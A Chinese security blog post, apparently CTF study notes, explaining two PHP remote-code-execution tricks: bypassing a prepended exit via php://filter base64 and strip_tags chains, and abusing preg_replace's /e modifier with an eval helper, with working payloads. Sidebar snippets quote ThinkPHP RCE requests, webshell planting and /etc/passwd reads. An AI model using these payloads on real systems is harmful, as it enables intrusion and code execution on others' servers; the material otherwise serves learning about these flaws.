RCE漏洞复现二

已于 2024-08-17 11:29:55 修改
阅读量629 收藏 12
点赞数 8
分类专栏: Web渗透 文章标签: web安全
于 2024-08-17 11:13:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/adc8848nb/article/details/141277594
版权

目录

RCE exit强制退出绕过

RCE preg_replace()正则替换

RCE exit强制退出绕过

<?php
$content = '<?php exit; ?>';
$content .= $_POST['txt'];
file_put_contents($_POST['filename'], $content);
payload
txt=aPD9waHAgcGhwaW5mbygpOw&filename=php://filter/write=convert.base64-decode/resource=aaa.php
或者
txt=PD9waHAgcGhwaW5mbygpOw&filename=php://filter/write=string.strip_tags|base64-decode/resource=aaa.php

不管后边跟什么内容,exit;都会在此之前强制退出。我们如何让exit;失效呢?

方法一:

主要使用php://伪协议,将content以base64编码写入,base64编码以[A-Za-z0-9+/=]四位字符为单位编码,除开[A-Za-z0-9+/=]这64位字符,其他字符不会编码,所以我们只用考虑phpexit,在其后面加上一位任意字符,让base64可以解码,这样就逃脱了exit;强制退出的限制。再在后面添加<? phpinfo();base64编码的结果。

方法二:

txt=PD9waHAgcGhwaW5mbygpOw&filename=php://filter/write=string.strip_tags|base64-decode/resource=aaa.php

我们直接使用string.strip_tags这个属性,去除php标签,这样exit就会失效。然后我们在将传值的内容base64编码,这样就不会被string.strip_tags属性删除。

RCE preg_replace()正则替换

<?php
​
function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}
​
foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}
​
function getFlag(){
    @eval($_GET['cmd']);
}
​payload ?\S*=${getFlag()}&cmd=phpinfo();

var_dump(preg_replace('/(\S*)/ie','strtolower("\\1")','${phpinfo()}'));// 结果:字符串'11'

首先我们来分析preg_replace()这个函数,有三个参数,第一个参数为要搜索的模式,通常传正则表达式匹配。

功能为:将匹配到$subject部分,替换为$replacement

preg_replace( string|array $pattern, string|array $replacement, string|array $subject, )

注意点一:

”\ \1“会被转义为"\1", \1 在正则表达式中有自己的含义。在换括号里面的正则表达式,\1会匹配到字符串中第一个符合括号里的正则匹配的字符串。

所以我们可以将$str全部匹配上,放入strtolower()函数中执行,这里的$str是我们执行命令代码的点,我们可以通过getFlag()函数获取的GET值来传递。我们这里以phpinfo()执行为例

\S*=phpinfo()

注意点二

如果现在$str=getFlag(),strtolower(phpinfo()),会直接把Phpinfo()转小写,

这里的'strtolower("{${eval(phpinfo())}}")'执行后相当于 strtolower("{${1}}") 又相当于 strtolower("{null}") 又相当于 '' 空字符串

preg_replace('/(' . $re . ')/ei','strtolower("\1")',$str),由以上可得该函数执行等价于 strtolower($str)

冉0勇
关注
专栏目录
ThinkPHP 3.2.3 RCE漏洞
归零者的博客
11-25 2149
用蚁剑连接地址:index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/23_11_25.log,密码为:8。访问index.php?ThinkPHP3.2.x 代码中如果模板赋值方法assign的第一个参数可控,可导致模板文件路径变量被覆盖为携带攻击代码的文件路径,导致任意文件包含,可执行任意代码。,burp 抓包,将路径改为。日志文件中包含执行代码。
CTFHub-rce
CN天狼
02-19 1376
CTFHub-rce
RCE复习(ctfhub上)
2302_80935968的博客
04-28 755
Web应用开发中为了灵活性、简洁性等会让应用调用代码执行函数或系统命令执行函数处理,若应用对用户的输入过滤不严,容易产生远程代码执行漏洞或系统命令执行漏洞、常见RCE漏洞函数1.系统命令执行函数system():能将字符串作为OS命令执行,且返回命令执行结果;exec():能将字符串作为OS命令执行,但是只返回执行结果的最后一行(约等于无回显);shell_exec():能将字符串作为OS命令执行。
Rce漏洞复习(ctfshow29-50)
m0_74402888的博客
07-23 1063
解释:通过post传递一个值,会存储在当前页面的变量中,get_defined_vars()获取当前页面所有变量,next取当前页面变量的第个,也就是一个数组,array_pop是弹出数组的值,eval执行弹出的值。<、<>、%20(space)、%09(tab)、$IFS$9、${IFS}、$IFS、{cat,/etc/passwd}、%0a(回车)利用include函数,绕过flag,用data为协议(data://text/plain)参数逃逸+为协议绕过+%0a绕过空格。
RCE漏洞复现
qq_43757105的博客
09-14 993
目录 漏洞描述 漏洞等级 影响版本 准备阶段 RCE漏洞复现具体步骤: Win2008搭建好环境且ip 地址为192.168.132.132​​ Win7可以访问到在win2008 phpstudy 上提前搭建的网站​​ Win7打开bp,设置好代理访问win2008​​ send to repeater​​​​ 在请求行加一行Accept-Charset: 并且还要把“deflated”面的空格删除(不删除无法执行命令) 准备执行命令system('whoami');
Spring Core RCE 漏洞复现
qq_73630656的博客
06-12 678
远程攻击者可在满足特定条件的基础上,通过框架的参数绑定功能获取AccessLogValve对象并诸如恶意字段值,从而触发pipeline机制并写入任意路径下的文件
有趣的的rce漏洞复现分析
huizhaohaha的博客
08-13 709
这时候又遇到一个问题啦,难道我们要一个一个试吗,不,作为一个学习网络安全的同学,有必要掌握至少一门的脚本编程语言,来提高我们的办事效率。这个时候,我们是理解了这个代码过滤了大小写和数字,那我们该如何成功拿下这个呢,根据代码的意思是我们通过get传参进行传递参数,那我们如何不做任何绕过,那么估计会触发输出hacker,我们先试一下触发后的情况。- `preg_match('/[a-z0-9]/i',$code)`:这个正则表达式匹配大小写不敏感的字母(`a-zA-Z`)或数字(`0-9`)。
nginxwebui-RCE漏洞复现
weixin_68999845的博客
09-21 960
nginxWebUI后台提供执行nginx相关命令的接口(/AdminPage/conf/runCmd),由于未对用户的输入进行过滤,导致可在后台执行任意命令。该漏洞属于命令拼接漏洞,所以可使用WAF进行防护。并且该系统权限校验存在问题,导致存在权限绕过,在前台可直接调用后台接口,最终可以达到无条件远程命令执行的效果。1./AdminPage/conf/runCmd后跟RCE_payload后紧跟&&nginx。该漏洞触发接口点为后台功能点,但攻击者不需要用户验证即可访问该url触发漏洞
ThinkPHP2-RCE漏洞复现
qq_51459600的博客
06-08 1238
影响版本:PHP 5.2~5.6/e 修 正符使 preg_replace() 将 replacement 参数当作 PHP 代码(在适当的逆向引用替换完之后)。
Log4j2 RCE 漏洞复现步骤以及根因
weixin_46073333的博客
12-12 6843
相信大家最近一定被log4j2的远程代码执行漏洞所刷屏了,各个互联网厂商,开源组织,还有相关企业都瑟瑟发抖,相关研发人员也都是加班加点紧急修复和改正。笔者也看了一些相关文章,感觉不少都...
vuhub thinkphp-5-rce漏洞复现
qq_46804551的博客
04-24 585
搭建 your-ip:8080 搭建成功 漏洞复现 ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5中,由于框架错误地处理了控制器名称,因此如果网站未启用强制路由(默认设置),则该框架可以执行任何方法,从而导致RCE漏洞。 poc: 它将执行phpinfo /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
PbootCMS 前台RCE漏洞复现
课嗨教育的专栏
06-24 745
PbootCMS是全新内核且永久开源免费的PHP企业网站开发建设管理系统,是一套高效、简洁、 强悍的可免费商用的PHP CMS源码,能够满足各类企业网站开发建设的需要PbootCMS v
网络安全(黑客)自学
白帽子凯哥聊黑客
10-10 843
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
10-09 897
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
2024年网络安全进阶手册:三个月黑客技术自学路线
最新发布
2401_85027336的博客
10-12 589
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全的全面指南
qq_42568323的博客
10-09 1055
网络安全是指保护计算机网络及其数据免受未经授权访问、攻击或破坏的过程。其目标是确保信息的机密性、完整性和可用性。
thinkphp5.0.23rce漏洞复现
09-22
ThinkPHP 5.0.23版本之前存在一个远程代码执行(RCE)的漏洞漏洞的形成原因是在获取method的方法中未正确处理方法名,导致攻击者可以调用Request类的任意方法并构造利用链,从而导致远程代码执行漏洞。具体的漏洞利用过程如下: 1. 访问靶机地址和端口号,进入首页。 2. 使用Burp抓包工具修改传参方式为POST,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd",其中pwd是系统执行命令的参数。 3. 接着进行漏洞复现过程,首先在Kali docker容器中启动此漏洞环境。 4. 使用浏览器访问Kali的IP地址接上8080端口。 5. 再次使用Burp抓包工具,修改传参方式为POST,URL后接入/index.php?s=captch,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd"。 6. 点击Burp中的Go按钮,尝试写入phpinfo。 7. 成功后,写入一句话木马,密码为aaa。 8. 进一步操作,可以上蚁剑。 漏洞复现成功后,您可以参考这篇文章了解更多细节:[https://www.cnblogs.com/zenb/p/14537240.html](https://www.cnblogs.com/zenb/p/14537240.html)。如果您对此漏洞有更多疑问,欢迎提出。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值